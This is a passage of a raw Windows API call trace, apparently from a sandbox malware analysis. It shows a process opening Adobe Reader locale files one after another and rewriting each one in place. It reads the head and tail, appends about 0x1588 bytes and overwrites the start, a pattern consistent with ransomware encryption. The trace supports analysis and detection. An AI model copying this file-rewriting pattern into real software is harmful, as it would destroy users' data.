lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.582] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7c000 [0070.582] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.583] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0070.583] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0070.583] CloseHandle (hObject=0x1fc) returned 1 [0070.717] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.717] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.717] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe5 [0070.717] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.717] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.717] ReleaseMutex (hMutex=0x168) returned 1 [0070.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0070.718] ReadFile (in: hFile=0x1fc, lpBuffer=0x26bf2f8, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf2f8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe5, lpOverlapped=0x0) returned 1 [0070.832] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0070.832] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x66d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2e9f2d0*=0x66d, lpOverlapped=0x0) returned 1 [0070.832] CloseHandle (hObject=0x1fc) returned 1 [0070.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\BRdlang32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\brdlang32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.296] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.296] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3400 [0071.296] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.296] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.296] ReleaseMutex (hMutex=0x168) returned 1 [0071.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.DAN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.DAN", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.DAN", lpUsedDefaultChar=0x0) returned 13 [0071.297] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.410] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0071.411] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e952a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e952a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.467] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0071.467] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.467] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0071.467] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.468] CloseHandle (hObject=0x1ec) returned 1 [0071.502] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Multimedia.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\multimedia.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x13400 [0071.979] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.979] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.979] ReleaseMutex (hMutex=0x168) returned 1 [0071.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.DAN", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0071.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.DAN", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.DAN", lpUsedDefaultChar=0x0) returned 14 [0071.979] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.981] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12400 [0071.981] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.982] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12400 [0071.982] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e948a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e948a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.983] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0071.983] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e948a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e948a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.983] CloseHandle (hObject=0x1cc) returned 1 [0071.984] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\SendMail.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\sendmail.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3e00 [0071.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.984] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.985] ReleaseMutex (hMutex=0x168) returned 1 [0071.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.DAN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.DAN", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.DAN", lpUsedDefaultChar=0x0) returned 12 [0071.985] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.986] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e00 [0071.987] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.988] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e00 [0071.988] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a6178*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a6178*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.988] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0071.989] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.989] CloseHandle (hObject=0x1cc) returned 1 [0071.989] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\AdobeCollabSync.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\adobecollabsync.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.990] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.991] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0071.991] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.991] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.991] ReleaseMutex (hMutex=0x168) returned 1 [0071.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.DEU", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0071.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.DEU", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.DEU", lpUsedDefaultChar=0x0) returned 19 [0071.991] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0071.993] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0071.994] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866ab8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2866ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0071.994] CloseHandle (hObject=0x1cc) returned 1 [0071.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\IA32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ia32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.995] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.995] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe00 [0071.995] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.996] ReleaseMutex (hMutex=0x168) returned 1 [0071.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.DEU", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.DEU", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.DEU", lpUsedDefaultChar=0x0) returned 8 [0071.996] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0071.998] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0071.998] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0071.998] CloseHandle (hObject=0x1cc) returned 1 [0071.999] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\SaveAsRTF.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\saveasrtf.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0071.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0071.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4c00 [0071.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0072.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.000] ReleaseMutex (hMutex=0x168) returned 1 [0072.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.DEU", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.DEU", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.DEU", lpUsedDefaultChar=0x0) returned 13 [0072.000] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.002] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3c00 [0072.002] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.003] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3c00 [0072.003] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.004] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0072.004] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.004] CloseHandle (hObject=0x1cc) returned 1 [0072.004] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\accessibility.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\accessibility.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0072.005] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0072.005] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb200 [0072.005] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0072.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.005] ReleaseMutex (hMutex=0x168) returned 1 [0072.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.ESP", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0072.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.ESP", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.ESP", lpUsedDefaultChar=0x0) returned 17 [0072.006] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.426] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa200 [0072.426] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e978a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.644] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa200 [0073.644] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.644] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0073.645] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.645] CloseHandle (hObject=0x1cc) returned 1 [0075.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\eBook.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 